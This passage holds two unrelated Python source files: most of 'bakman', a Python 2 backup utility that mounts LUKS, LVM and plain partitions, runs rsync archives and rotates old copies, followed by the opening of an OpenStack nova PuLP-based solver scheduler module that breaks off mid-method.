    CONFIGFILE = os.path.join(UEADM,'bakman.conf.py')
    DATEFILE = os.path.join(UEADM,'bakman.dates')
#
# Generic utility functions
#
def checkSource(srcPath):
    """Return True if srcPath exists and contains at least one entry."""
    return os.path.exists(srcPath) and os.listdir(srcPath) != []
def checkDest(dstPath, isMountPoint=False):
    """Return True if dstPath exists and, when isMountPoint is set, is
    actually a mount point (not merely an empty mount directory)."""
    if not os.path.exists(dstPath):
        return False
    if not isMountPoint:
        return True
    # Only the mount directory may exist while nothing is mounted there.
    return os.path.ismount(dstPath)
#
# Classes for backup configuration and steps
#
class StepException(Exception):
    """Exception raised for errors occurring in backup steps."""
class Step:
    """Base class for all backup steps.

    A step belongs to a BackupConfiguration (set via setParentConfig) and
    may implement any of isAvailable/mount/run/unmount.
    """
    def __init__(self, keepAlive=False):
        # keepAlive: presumably keeps the step attached after the backup
        # runs -- confirm against BackupConfiguration's handling.
        self.keepAlive = keepAlive
        self.parentConfig = None
        self.mountPoint = None
    def setParentConfig(self,parentConfig):
        """Set parent BackupConfiguration instance."""
        self.parentConfig = parentConfig
        if self.mountPoint is None:
            self.mountPoint = self.mountPath()
    def __str__(self):
        """Return string with brief info about step."""
        return 'step base class'
    def device(self, devinfo=None):
        """Return path to device based on parent configuration."""
        return self.parentConfig.device(devinfo)
    def mountPath(self, relPath=None, path=None):
        """Determine path using parent configuration and given paths.

        If path is set, return path. Otherwise the mount point is
        determined from options.mountBase or the mountBase set in the
        parent BackupConfiguration, the name of the parent
        configuration, and relPath, if given."""
        if path is not None:
            return path
        mountBase = options.mountBase
        if mountBase is None:
            mountBase = self.parentConfig.mountBase
        if mountBase is None:
            mountBase = '/media'
        p = [ mountBase ]
        try:
            p.append(self.parentConfig.name)
        except AttributeError:
            # BUG FIX: was a bare "except:" (which would also hide
            # KeyboardInterrupt etc.); only a missing/None parent
            # configuration should be tolerated here.
            p.append('UNKNOWN')
            warning('mountPath called without parent configuration in step of class %s' % self.__class__.__name__)
        if relPath is not None:
            p.append(relPath)
        return os.path.sep.join(p)
    def isAvailable(self):
        """Return True if step can be done (virtual)."""
        return True
    def mount(self):
        """Mount or attach device (virtual)."""
        pass
    def run(self):
        """Carry out the backup (virtual)."""
        pass
    def unmount(self):
        """Unmount or detach device (virtual)."""
        pass
class Mount(Step):
    """Mount a partition."""
    def __init__(self, relPath, devinfo, mountOpts='', keepAlive=False, sleepBeforeUnmount=0):
        """Create mount step.

        If relPath is not empty, it will be appended to the default mount point.
        devinfo is either a device or a partition number for the disk
        defined in the parent configuration."""
        Step.__init__(self,keepAlive)
        self.relPath = relPath
        self.devinfo = devinfo
        # Pre-render the "-o <opts>" string; empty string means no options.
        self.mountOpts = '-o %s' % mountOpts if mountOpts else ''
        self.sleepBeforeUnmount = sleepBeforeUnmount
    def setParentConfig(self,parentConfig):
        Step.setParentConfig(self,parentConfig)
        if self.relPath:
            self.mountPoint = os.path.join(self.mountPoint,self.relPath)
    def __str__(self):
        device = self.device(self.devinfo)
        return 'Mount %s --> %s (options: %s)' % (device,self.mountPoint,self.mountOpts)
    def isAvailable(self):
        """Return true if device to be mounted is available.

        If the device path determined from self.devinfo and the parent configuration is
        not an absolute path, return True assuming that the device availability is being
        checked by a previous step."""
        device = self.device(self.devinfo)
        if device[:10] == '/dev/disk/':
            return os.path.exists(device)
        else:
            return True
    def mount(self):
        """Create the mount point if needed and mount the device."""
        device = self.device(self.devinfo)
        #info('Mounting %s at %s' % (device,self.mountPoint))
        if not os.path.exists(self.mountPoint):
            run('mkdir -p %s' % self.mountPoint)
        run('mount %s %s %s' % (self.mountOpts,device,self.mountPoint), exceptionOnError=True)
    def unmount(self):
        """Sync, optionally wait for the device to settle, then unmount."""
        device = self.device(self.devinfo)
        #info('Unmounting %s from %s' % (device,self.mountPoint))
        run('sync')
        if self.sleepBeforeUnmount:
            debug('waiting %i second(s) for device to settle' % self.sleepBeforeUnmount)
            time.sleep(self.sleepBeforeUnmount)
        run('umount %s' % self.mountPoint)
class LUKS(Step):
    """Attach a LUKS partition."""
    def __init__(self, name, devinfo, luksKey='', luksKeyFile='', keepAlive=False):
        """The device will be attached at /dev/mapper/bakman-name where name is the
        parameter name. The LUKS password is specified either directly in the configuration
        file as parameter luksKey, or indirectly in a file luksKeyFile."""
        Step.__init__(self,keepAlive)
        self.name = name
        self.devinfo = devinfo
        self.luksName = 'bakman-%s' % (name) # Will be overridden by setParentConfig
        self.luksKey = luksKey
        self.luksKeyFile = luksKeyFile
    def __str__(self):
        device = self.device(self.devinfo)
        return 'LUKS volume %s --> %s' % (device,self.luksName)
    def setParentConfig(self,parentConfig):
        """Set parent BackupConfiguration instance."""
        Step.setParentConfig(self,parentConfig)
        self.luksName = '%s-%s' % (self.parentConfig.name,self.name)
    def isAvailable(self):
        """Available only when both a key source and the device exist."""
        device = self.device(self.devinfo)
        hasKey = self.luksKey or os.path.exists(self.luksKeyFile)
        return hasKey and os.path.exists(device)
    def mount(self):
        """Open the LUKS device, feeding the passphrase on stdin."""
        #info('Opening LUKS device %s' % (self.luksName))
        device = self.device(self.devinfo)
        if self.luksKeyFile:
            key = open(self.luksKeyFile,'r').read().strip()
        else:
            key = self.luksKey
        debug('running cmd: cryptsetup luksOpen %s %s > /dev/null 2>&1' % (device,self.luksName))
        # Python 2 print-to-file syntax: writes the passphrase + newline to
        # cryptsetup's stdin.
        cryptsetup = os.popen('cryptsetup luksOpen %s %s > /dev/null 2>&1' % (device,self.luksName), 'w')
        print >>cryptsetup, key
        cryptsetup.close()
        # Success is verified by the mapper node appearing.
        if not os.path.exists('/dev/mapper/'+self.luksName):
            raise StepException('Opening LUKS device %s failed' % self.luksName)
    def unmount(self):
        #info('Closing LUKS device %s' % (self.luksName))
        run('cryptsetup luksClose %s' % self.luksName)
class LVM(Step):
    """Attach a logical volume group."""
    def __init__(self, name, keepAlive=False):
        """Attach a logical volume group with the given name."""
        Step.__init__(self,keepAlive)
        self.name = name
    def __str__(self):
        return 'LVM volume %s' % self.name
    def mount(self):
        #info('Attaching logical volumes for group %s' % self.name)
        # Create any missing /dev nodes, then activate the volume group.
        run('vgscan --mknodes' )
        run('vgchange -ay %s' % self.name, exceptionOnError=True)
        # Success is verified by the /dev/<group> directory appearing.
        if not os.path.exists('/dev/'+self.name):
            raise StepException('Attaching logical volumes for group %s failed' % self.name)
    def unmount(self):
        #info('Detaching logical volumes for group %s' % (self.name))
        run('vgchange -an %s' % self.name)
class Command(Step):
    """Generic step class to execute a command."""
    def __init__(self, cmd, **kwargs):
        # cmd is a %-format template; kwargs supplies the substitutions.
        Step.__init__(self)
        self.cmd = cmd
        self.kwargs = kwargs
    def __str__(self):
        cmd = self.cmd % self.kwargs
        return 'Command: %s' % cmd
    def run(self):
        """Render the command template and execute it."""
        cmd = self.cmd % self.kwargs
        #info('  executing %s' % cmd)
        run(cmd, printOutput=options.verbose,dryrun=options.dryrun)
class SysBackup(Command):
    """Run sysbackup."""
    def __init__(self):
        # Fixed external command with no arguments; execution and the
        # verbose/dryrun handling come from Command.run.
        Command.__init__(self, 'sysbackup')
    def __str__(self):
        return 'SysBackup (run cmd: %s)' % self.cmd
class CopyFiles(Step):
    """Copy a list of files to a target directory and refresh a
    LASTUPDATED-*.TIMESTAMP marker file there."""
    def __init__(self, targetDir, fileList=None):
        Step.__init__(self)
        # BUG FIX: fileList previously defaulted to None, which made
        # isAvailable() and run() crash with a TypeError when iterating.
        # Treat a missing list as "no files" (only the marker is updated).
        self.fileList = fileList if fileList is not None else []
        self.targetDir = targetDir
    def __str__(self):
        return 'CopyFiles (%s --> %s)' % (self.fileList,self.targetDir)
    def isAvailable(self):
        """Available when every source file and the target dir exist."""
        for f in self.fileList:
            if not os.path.exists(f):
                return False
        return os.path.exists(self.targetDir)
    def run(self):
        """Copy each file, then replace the date-stamped marker file."""
        for f in self.fileList:
            run('/bin/cp -f --preserve=mode,timestamps %s %s' % (f,self.targetDir),
                dryrun=options.dryrun)
        run('/usr/bin/rm -f %s/LASTUPDATED-*.TIMESTAMP' % self.targetDir,
            dryrun=options.dryrun)
        run("/usr/bin/touch %s/`date '+LASTUPDATED-%%b-%%d-%%G.TIMESTAMP'`" % self.targetDir,
            dryrun=options.dryrun)
class RotateBackups(Step):
    """Rotate versioned backup files and delete superfluous copies."""
    def __init__(self, nKeep, dstDir, mountPoint=None):
        Step.__init__(self)
        # nKeep: number of old numbered copies to keep (<=0 disables rotation)
        self.nKeep = int(nKeep)
        self.dstDir = dstDir
        self.mountPoint = mountPoint
        self.path = None # will be set by setParentConfig
    def setParentConfig(self,parentConfig):
        Step.setParentConfig(self,parentConfig)
        self.path = os.path.join(self.mountPoint,self.dstDir)
    def isAvailable(self):
        return os.path.exists(self.path)
    def __str__(self):
        return 'RotateBackups (keep %i old copies at %s)' % (self.nKeep,self.path)
    def run(self):
        """Delete the oldest copy, then shift each copy i to i+1."""
        if self.nKeep<=0:
            return
        delPath = os.path.join(self.path,str(self.nKeep))
        # Safety guard: never run "rm -rf" on / or on a path containing
        # wildcard/template characters.
        if delPath=='/' or ('*' in delPath) or ('%' in delPath) or ('?' in delPath):
            error('Found wildcard character in path %s - SKIPPING backup rotation' % delPath)
            return
        if os.path.exists(delPath):
            cmd = 'rm -rf %s' % delPath
            run(cmd, printOutput=True, dryrun=options.dryrun)
        # Shift oldest first so no copy is overwritten during the rotation.
        for i in range(self.nKeep-1,-1,-1):
            srcPath = os.path.join(self.path,str(i))
            dstPath = os.path.join(self.path,str(i+1))
            if os.path.exists(srcPath):
                cmd = 'mv -f %s %s' % (srcPath,dstPath)
                run(cmd, printOutput=True, dryrun=options.dryrun)
class Rsync(Step):
    """Step class to run rsync."""
    def __init__(self, name, rsyncOpts='', rsyncArgs='-axHSAX --delete-excluded'):
        """Create rsync backup of single partition or directory.
        rsyncArgs are the default primary rsync arguments (-axHSAX
        --delete-excluded) and should normally not be changed by
        the user. Additional rsync options should be passed through
        parameter rsyncOpts. The command line options -n and -v
        will add the corresponding rsync options."""
        Step.__init__(self)
        # 'root' backs up '/'; any other name maps to '/<name>/' and the
        # slashes are flattened to '-' for the destination directory name.
        self.name = name.replace('/','-')
        self.src = '/%s/' % name if not name=='root' else '/'
        self.rsyncOpts = rsyncOpts
        self.rsyncArgs = rsyncArgs
    def makeCommand(self):
        """Return string with full command line for rsync command."""
        opts = self.rsyncArgs
        if options.rsyncv:
            opts += ' -v'
        if options.rsyncn:
            opts += ' -n'
        # NOTE(review): '-v' is appended both when rsyncv is set and when it
        # is not, so rsync always runs verbose (doubly so with -V). The same
        # pattern appears in RsArchive.makeCommand - possibly intended;
        # confirm before changing.
        if not options.rsyncv:
            opts += ' -v'
        if self.rsyncOpts:
            opts += ' '+self.rsyncOpts
        # self.mountPoint is supplied by the parent configuration, not here.
        return 'rsync %s %s %s/%s' % (opts,self.src,self.mountPoint,self.name)
    def __str__(self):
        return 'Rsync: '+self.makeCommand()
    def isAvailable(self):
        return checkSource(self.src)
    def run(self):
        """Run rsync if the source has files; otherwise warn and skip."""
        if checkSource(self.src):
            cmd = self.makeCommand()
            #info(' executing %s' % cmd)
            run(cmd, printOutput=True, dryrun=options.dryrun)
        else:
            # BUGFIX: 'src' was an undefined name here (NameError on the
            # skip path); the source path lives in self.src.
            warning('No files found in %s - skipping rsync' % self.src)
class RsArchive(Step):
    """rsarchive backup."""
    def __init__(self, dstDir, keepOldVersions, srcList, rsyncOpts='', rsyncArgs='-axHSAX --delete-excluded',
                 exclPatterns=EXCLUDEPATTERN, exclList=None,
                 mountPoint=None):
        """Create rsarchive backup using rsync.
        keepOldVersions can be set to False (single versions), True
        (multiple versions rotated externally) or to a positive
        integer n to automatically rotate through n versions.
        --delete-excluded is automatically added to rsyncArgs if
        keepOldVersions is 0 or False."""
        Step.__init__(self)
        self.mountPoint = mountPoint
        self.path = None # will be set by setParentConfig
        self.dstDir = dstDir
        self.dstPath = None # will be set by setParentConfig
        if isinstance(keepOldVersions,bool):
            # versioned, but rotating done outside of RsArchive
            self.isVersioned = keepOldVersions
            self.nKeep = 0
        else:
            # integer: rotation handled internally by run()
            self.isVersioned = (keepOldVersions>0)
            self.nKeep = int(keepOldVersions)
            if self.nKeep<0:
                self.nKeep=0
        self.srcList = srcList
        self.rsyncArgs = rsyncArgs
        self.rsyncOpts = rsyncOpts
        self.exclPatterns = exclPatterns
        self.exclList = exclList if exclList else []
    def setParentConfig(self,parentConfig):
        # Resolve destination paths once the mount point hierarchy is known.
        Step.setParentConfig(self,parentConfig)
        if self.dstDir:
            self.path = os.path.join(self.mountPoint,self.dstDir)
        else:
            self.path = self.mountPoint
        if self.isVersioned:
            # '0' is the current backup; '1' (the previous one) serves as
            # the --link-dest hard-link reference for unchanged files.
            self.linkPath = os.path.join(self.path,'1')
            self.dstPath = os.path.join(self.path,'0')
        else:
            self.dstPath = self.path
    def makeCommand(self, src):
        """Return string with full command line for rsync command."""
        cmd = ['rsync']
        cmd.append(self.rsyncArgs)
        if self.isVersioned:
            if src=='/':
                cmd.append(' --link-dest %s/root' % self.linkPath)
            else:
                cmd.append(' --link-dest %s' % self.linkPath)
        if self.rsyncOpts:
            cmd.append(self.rsyncOpts)
        if options.rsyncv:
            cmd.append('-v')
        if options.rsyncn:
            cmd.append('-n')
        # NOTE(review): '-v' is appended both when rsyncv is set and when it
        # is not, so rsync always runs verbose. Same pattern as in
        # Rsync.makeCommand - confirm whether intentional.
        if not options.rsyncv:
            cmd.append('-v')
        for e in self.exclList:
            cmd.append('--exclude=%s' % e)
        if self.exclPatterns:
            cmd.append('--exclude-from=%s' % self.exclPatterns)
        # '/' is archived into the 'root' subdirectory of the destination.
        if src=='/':
            cmd.append('/ %s/root' % self.dstPath)
        else:
            cmd.append('%s %s' % (src,self.dstPath))
        return ' '.join(cmd)
    def __str__(self):
        if self.nKeep>0:
            cmds = ['RsArchive (%s) - rotate to keep %i old copies' % (self.srcList,self.nKeep)]
        else:
            cmds = ['RsArchive (%s)' % self.srcList]
        # A leading '*' marks sources that currently have files to back up.
        for src in self.srcList:
            cmds.append('%1s %s' % ('*' if checkSource(src) else '',
                                    self.makeCommand(src)))
        return '\n'.join(cmds)
    def isAvailable(self):
        if not checkDest(self.mountPoint,True):
            return False
        for d in self.srcList:
            if not checkSource(d):
                return False
        return True
    def run(self):
        """Optionally rotate numbered versions, then rsync each source."""
        if not checkDest(self.mountPoint,True):
            error('Destination %s is not mounted' % self.mountPoint)
        else:
            if not os.path.exists(self.dstPath):
                run('mkdir -p %s' % self.dstPath, dryrun=options.dryrun)
            if self.nKeep>0:
                # rotate old versions
                # NOTE: this duplicates the RotateBackups.run() logic,
                # including the same wildcard safety guard.
                info('%s starting rotate, keeping %s old versions ...' % (time.asctime(),self.nKeep))
                delPath = os.path.join(self.path,str(self.nKeep))
                if delPath=='/' or ('*' in delPath) or ('%' in delPath) or ('?' in delPath):
                    error('Found wildcard character in rotation path %s - skipping backup' % delPath)
                    return
                if os.path.exists(delPath):
                    cmd = 'rm -rf %s' % delPath
                    run(cmd, printOutput=True, dryrun=options.dryrun)
                # Move highest-numbered copies first so nothing is overwritten.
                for i in range(self.nKeep-1,-1,-1):
                    srcPath = os.path.join(self.path,str(i))
                    dstPath = os.path.join(self.path,str(i+1))
                    if os.path.exists(srcPath):
                        cmd = 'mv -f %s %s' % (srcPath,dstPath)
                        run(cmd, printOutput=True, dryrun=options.dryrun)
            for src in self.srcList:
                if checkSource(src):
                    info('%s starting rsync of %s ...' % (time.asctime(),src))
                    cmd = self.makeCommand(src)
                    run(cmd, printOutput=True, dryrun=options.dryrun)
                else:
                    warning('No files found in %s - skipping rsync' % src)
            # Place the timestamp inside the copied directory when a single
            # directory (no trailing slash) was archived without dstDir.
            stampPath = self.dstPath
            if (not self.dstDir) and len(self.srcList)==1 and self.srcList[0][-1]!='/':
                stampPath = os.path.join(stampPath,os.path.basename(self.srcList[0]))
            run('touch %s/RSARCHIVE.TIMESTAMP' % stampPath, dryrun=options.dryrun)
class BackupConfiguration:
    """Define a backup configuration.

    A configuration groups common steps (run for every part) and named
    parts, each with its own list of steps.
    """
    def __init__(self, name, description, diskId=None, mountBase='/media', *commonSteps):
        self.name = name
        self.description = description
        self.diskId = diskId
        self.mountBase = mountBase
        self.commonSteps = commonSteps
        for s in commonSteps:
            s.setParentConfig(self)
        self.parts = [] # list of tuples (name,stepList)
        self.locked = False # flag to prevent erroneous changes to configuration
    def lock(self):
        """Lock configuration."""
        self.locked = True
    def device(self,devinfo=None):
        """Return absolute device path to disk or partition.
        devinfo is either a device (/dev/...) or a partition number.
        In the former case, devinfo is returned. In the latter case,
        diskId and devinfo are used to obtain the full path to the
        partition's device. If devinfo is None, the path to the disk
        is returned, otherwise devinfo is assumed to be a partition
        number and the device path to that partition is returned."""
        if devinfo is None:
            return '/dev/disk/by-id/%s' % (self.diskId)
        try:
            # A slice raises TypeError for non-indexable devinfo (e.g. int),
            # which falls through to the partition-number case below.
            if devinfo[0:5]=='/dev/':
                return devinfo
        except:
            pass
        return '/dev/disk/by-id/%s-part%i' % (self.diskId,devinfo)
    # FIXME: optional part argument to check if part is avaiable
    def isAvailable(self):
        """Return True if configuration is available."""
        # A configuration without a diskId does not depend on a device.
        if self.diskId is None:
            return True
        else:
            return os.path.exists(self.device())
    def isAvailableCommonSteps(self):
        """Return True if common steps are available."""
        for s in self.commonSteps:
            if not s.isAvailable():
                return False
        return True
    def definedParts(self):
        """Return list of all defined parts."""
        return [name for (name,steps) in self.parts]
    def availableParts(self):
        """Return list with names of available parts."""
        if not self.isAvailable():
            return []
        if not self.isAvailableCommonSteps():
            return [] # No parts available if common steps not available
        available = []
        # A part is available only if every one of its steps is available.
        for (name,steps) in self.parts:
            isAvailable = True
            for s in steps:
                isAvailable = isAvailable and s.isAvailable()
            if isAvailable:
                available.append(name)
        return available
    def add(self, name, *steps):
        """Add a new part with given steps. Raises RuntimeError if locked."""
        if self.locked:
            raise RuntimeError('config file error: cannot add part %s to locked configuration %s' % (name,self.name))
        else:
            self.parts.append( (name,list(steps)) )
            for s in steps:
                s.setParentConfig(self)
    def steps(self, partName):
        """Return list of steps for part with name partName."""
        for (name,steps) in self.parts:
            if name==partName:
                return steps
        raise LookupError('Part %s not found' % partName)
    def uniqueStepConfiguration(self, partNames,
                                description='BackupConfiguration with unique steps for selected parts'):
        """Return a BackupConfiguration with unique steps for given parts.

        Steps already present in the common steps or in an earlier part
        are dropped, so each step appears at most once overall."""
        steps = set()
        for s in self.commonSteps:
            steps.add(s)
        c = BackupConfiguration(self.name,description,self.diskId,self.mountBase,*self.commonSteps)
        for name in partNames:
            uniqueSteps = []
            c.parts.append( (name,uniqueSteps) )
            for s in self.steps(name):
                if not s in steps:
                    uniqueSteps.append(s)
                    steps.add(s)
        return c
    def dump(self):
        """Print a human-readable overview of all steps and parts."""
        print 'Configuration %s (%s):' % (self.name,self.description)
        print ' --- steps marked as KEEP will be unmounted in reverse order at the end'
        print " --- '*' denotes parts or actions that are available"
        print
        available = self.availableParts() if self.isAvailable() else []
        if len(self.parts)+len(self.commonSteps)>0:
            print ' %1s Common steps:' % ('*' if self.isAvailableCommonSteps() else '')
            def printStep(keepAlive,step):
                # Indent each line of the step description; mark keep-alive steps.
                sep = ' KEEP ' if keepAlive else 10*' '
                for l in str(step).split('\n'):
                    print sep,l
            for s in self.commonSteps:
                printStep(s.keepAlive,s)
            for (name,steps) in self.parts:
                print
                print ' %1s %s:' % ('*' if name in available else '',name)
                for s in steps:
                    printStep(s.keepAlive,s)
        else:
            print '\n%s has no parts' % self.name
#
# Utilities to manage configurations and execute commands
#
def prepareConfig(cmdargs):
    """Return (configName,config,partList).
    configName is the name of the configuration.
    config is a copy of configuration configName that has only unique steps.
    partList is the list of available parts to use.

    cmdargs[0] is the configuration name; any further arguments select
    specific parts (default: all defined parts).
    Raises LookupError if the configuration does not exist."""
    configName = cmdargs[0]
    try:
        config = configDict[configName]
    except KeyError:
        # BUGFIX: was a bare 'except:', which also converted unrelated
        # errors (even KeyboardInterrupt in Python 2) into 'not found'.
        raise LookupError('Configuration %s not found' % configName)
    availableParts = config.availableParts()
    definedParts = config.definedParts()
    # Note: ''.split(',') yields [''], which never matches a real part name.
    excludeParts = options.excludeParts.split(',')
    parts = []
    tryParts = cmdargs[1:] if len(cmdargs)>1 else config.definedParts()
    for p in tryParts:
        if p in availableParts:
            if not p in excludeParts:
                parts.append(p)
        else:
            # Explicitly requested parts that are missing are an error;
            # skipping during an implicit full run is only a warning.
            if len(cmdargs)>1:
                error('Part %s of configuration %s is not available or not defined.' % (p,configName))
            else:
                warning('Part %s not available - skipping' % p)
    info('')
    info('Configuration: %s' % configName)
    info('Defined parts: %s' % definedParts)
    info('Available parts: %s' % availableParts)
    info('Excluded parts: %s' % excludeParts)
    info('Using parts: %s' % parts)
    return (configName,config.uniqueStepConfiguration(parts),parts)
def execute(partList, config, doMount=False, doRun=False, doUnmount=False):
    """Execute the requested actions (mount, run, unmount) on the steps
    of the selected parts, common steps first. Steps flagged keepAlive
    are unmounted last, in reverse order, after all parts finished."""
    fmt = 'starting %-8s for step %-16s (%s)'
    # Check that bakman is not running already
    # FIXME - see e.g. http://stackoverflow.com/questions/788411/check-to-see-if-python-script-is-running
    # Check if there are any steps. This takes also care of preventing execution
    # of unavailable common steps (if common steps are not available, no parts are
    # available.
    if len(partList)==0:
        return
    # Check that we are root
    if os.geteuid()!=0:
        error('Must run as root')
        sys.exit(1)
    # Common steps
    info('')
    info('%s Processing common steps ...' % (time.asctime()))
    if doMount:
        for s in config.commonSteps:
            debug(fmt % ('mount',s.__class__.__name__,'common steps'))
            s.mount()
    if doRun:
        for s in config.commonSteps:
            debug(fmt % ('run',s.__class__.__name__,'common steps'))
            s.run()
    if doUnmount:
        # Unmount in reverse order; keep-alive steps are deferred to the end.
        for s in reversed(config.commonSteps):
            if not s.keepAlive:
                debug(fmt % ('unmount',s.__class__.__name__,'common steps'))
                s.unmount()
    # Process parts
    for p in partList:
        info('')
        info('%s Processing part %s ...' % (time.asctime(),p))
        steps = config.steps(p)
        if doMount:
            for s in steps:
                debug(fmt % ('mount',s.__class__.__name__,p))
                s.mount()
        if doRun:
            for s in steps:
                debug(fmt % ('run',s.__class__.__name__,p))
                s.run()
        if doUnmount:
            for s in reversed(steps):
                if not s.keepAlive:
                    debug(fmt % ('unmount',s.__class__.__name__,p))
                    s.unmount()
    # Finalize parts kept alive and common steps
    if doUnmount:
        for p in reversed(partList):
            for s in reversed(config.steps(p)):
                if s.keepAlive:
                    debug(fmt % ('finalize',s.__class__.__name__,p))
                    s.unmount()
        for s in reversed(config.commonSteps):
            if s.keepAlive:
                debug(fmt % ('finalize',s.__class__.__name__,'common steps'))
                s.unmount()
    # Done
    info('')
    info('%s Done' % (time.asctime()))
#
# Command line execution
#
# Command line driver: parse options, load the configuration file, then
# dispatch on the command word (list / dump / mount / unmount / run / debug).
if __name__ == '__main__':
    cmdHelper = CmdHelper('optparse', __version__, __usage__,
                          hasInteractive=True,
                          hasBatch=True,
                          logFile=LOGFILE,
                          logSeparator=70*'-',
                          logTimestampFmt='%(asctime)s %(levelname)-8s ')
    defaultConfigFile = CONFIGFILE
    defaultRunLogFile = DATEFILE
    cmdHelper.add_option('', '--runlog', dest='runlog', default=os.path.expandvars(defaultRunLogFile),
                         help='path to run log file (default: %s)' % defaultRunLogFile)
    cmdHelper.add_option('-c', '--config', dest='config', default=os.path.expandvars(defaultConfigFile),
                         help='path to config file (default: %s)' % defaultConfigFile)
    cmdHelper.add_option('-m', '--mount', dest='mountBase', default=None,
                         help='base mount point for backup partitions mounted by bakman (default: /media)')
    cmdHelper.add_option('-x', '--exclude', dest='excludeParts', default='',
                         help='comma-separated string of parts to exclude')
    cmdHelper.add_option('', '--modify-window', dest='modifywindow', type=int, default='3601',
                         help='rsync: set maximum time differencee to ignore (used only for FAT '
                         'filesystems, default: 3601)')
    cmdHelper.add_option('-V', '--rsyncv', dest='rsyncv', action='store_true', default=False,
                         help='rsync: show files being transferred')
    cmdHelper.add_option('-n', '--rsyncn', dest='rsyncn', action='store_true', default=False,
                         help='rsync: only show what would be done but do not copy anything')
    cmdHelper.add_option('', '--dryrun', dest='dryrun', action='store_true', default=False,
                         help='only log commands (use --debug), but do not execute anything in run step '
                         '(mount/unmount are still executed)')
    (options,args) = cmdHelper.parse()
    if len(args) < 1:
        error('wrong number of command line arguments')
        sys.exit(1)
    # Command processing
    cmd = args[0]
    cmdargs = args[1:]
    cmdOk = False   # set True by whichever command branch matched
    try:
        # Read config file
        # The config file is plain Python; it populates configDict with
        # BackupConfiguration objects (plus any helper names it defines).
        configDict = {}
        execfile(options.config,globals(),configDict)
        # List defined configuration
        if cmd=='list' and len(cmdargs)==0:
            print 'Configuration: %s' % options.config
            print 'Log file: %s' % options.logfile
            print
            print 'List of backup configurations (* means configration is available):'
            for configName in sorted(configDict.keys()):
                # Skip helper names defined in the config file.
                if not isinstance(configDict[configName],BackupConfiguration):
                    continue
                config = configDict[configName]
                print ' %1s %-15s %s' % ('*' if config.isAvailable() else '',
                                         config.name,
                                         config.description)
            cmdOk = True
        # List parts in configuration
        if cmd=='list' and len(cmdargs)==1:
            configName = cmdargs[0]
            try:
                config = configDict[configName]
            except:
                raise LookupError('Configuration %s not found' % configName)
            available = config.availableParts() if config.isAvailable() else []
            print 'Parts in configuration %s (* means part is available):' % configName
            for (name,steps) in config.parts:
                print ' %1s %-15s' % ('*' if name in available else ' ',name)
            cmdOk = True
        # Dump configuration
        if cmd=='dump' and len(cmdargs)==1:
            configName = cmdargs[0]
            try:
                config = configDict[configName]
            except:
                raise LookupError('Configuration %s not found' % configName)
            config.dump()
            cmdOk = True
        # Mount all or selected parts in specific configuration
        if cmd=='mount' and (len(cmdargs)==1 or len(cmdargs)==2):
            (configName,stepConfig,parts) = prepareConfig(cmdargs)
            execute(parts,stepConfig,doMount=True)
            cmdOk = True
        # Unmount all or selected parts in specific configuration
        if cmd=='unmount' and (len(cmdargs)==1 or len(cmdargs)==2):
            (configName,stepConfig,parts) = prepareConfig(cmdargs)
            execute(parts,stepConfig,doUnmount=True)
            cmdOk = True
        # Run all or selected parts in specific configuration
        if cmd=='run' and len(cmdargs)>=1:
            (configName,stepConfig,parts) = prepareConfig(cmdargs)
            # In interactive mode, show the plan and ask for confirmation.
            if not options.batch:
                if not parts:
                    error('Nothing to run - backup aborted.')
                    sys.exit(1)
                try:
                    config = configDict[configName]
                except:
                    raise LookupError('Configuration %s not found' % configName)
                print
                config.dump()
                print
                confirm('Execute backup with parts %s' % parts)
            execute(parts,stepConfig,doMount=True,doRun=True,doUnmount=True)
            # Record each real (non-dryrun) backup run in the run log.
            if not options.dryrun:
                with open(options.runlog,'a') as f:
                    line = time.strftime('%a %b %d %X %Z %Y '+cmdLine(True)+'\n')
                    f.write(line)
            cmdOk = True
        # Enter interactive debug mode
        if cmd=='debug':
            # PYTHONINSPECT drops into the interpreter after the script ends.
            os.environ['PYTHONINSPECT'] = '1'
            print 'Entering interactive mode (configDict contains configuration info) ...'
            cmdOk = True
        if not cmdOk:
            raise CmdError('illegal command or number of arguments')
    except Exception, e:
        handleError(e,options.debug)
    except KeyboardInterrupt:
        # KeyboardInterrupt derives from BaseException, so it is not
        # swallowed by the Exception handler above.
        error('Backup aborted by user (CTRL-C)')
        sys.exit(1)
| |
# Copyright (c) 2014 Cisco Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from pulp import constants
from pulp import pulp
from pulp import solvers as pulp_solver_classes
from oslo.config import cfg
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.scheduler import solvers as scheduler_solver
from nova import solver_scheduler_exception as exception
# Configuration options of the PuLP-based solver scheduler; registered
# under the [solver_scheduler] group.
pulp_solver_opts =[
        cfg.IntOpt('pulp_solver_timeout_seconds',
                   default=20,
                   help='How much time in seconds is allowed for solvers to '
                        'solve the scheduling problem. If this time limit '
                        'is exceeded the solver will be stopped.'),
]
CONF = cfg.CONF
CONF.register_opts(pulp_solver_opts, group='solver_scheduler')
# Module-level logger.
LOG = logging.getLogger(__name__)
class PulpVariables(scheduler_solver.BaseVariables):
    """Holds the LP decision variables of the host/instance matrix."""

    def populate_variables(self, host_keys, instance_keys):
        """Create one binary LP variable per (host_key, instance_key) pair.

        Variable names follow the 'HI_<host_key>_<instance_key>' convention
        relied upon elsewhere when mapping solutions back to hosts.
        """
        matrix = []
        for host_key in host_keys:
            row = []
            for instance_key in instance_keys:
                var_name = 'HI_' + host_key + '_' + instance_key
                row.append(
                    pulp.LpVariable(var_name, 0, 1, constants.LpInteger))
            matrix.append(row)
        self.host_instance_matrix = matrix
class PulpSolver(scheduler_solver.BaseHostSolver):
    """A LP based pluggable LP solver implemented using PULP modeler."""
    variables_cls = PulpVariables
    def __init__(self):
        super(PulpSolver, self).__init__()
        self.cost_classes = self._get_cost_classes()
        self.constraint_classes = self._get_constraint_classes()
    def _get_operation(self, op_str):
        """Map a comparison operator string to a two-argument callable.

        Returns None for unknown operator strings."""
        ops = {
            '==': lambda x, y: x == y,
            '!=': lambda x, y: x != y,
            '>=': lambda x, y: x >= y,
            '<=': lambda x, y: x <= y,
            '>': lambda x, y: x > y,
            '<': lambda x, y: x < y}
        return ops.get(op_str)
    def _calculate_host_instance_cost_matrix(self, cost_matrix):
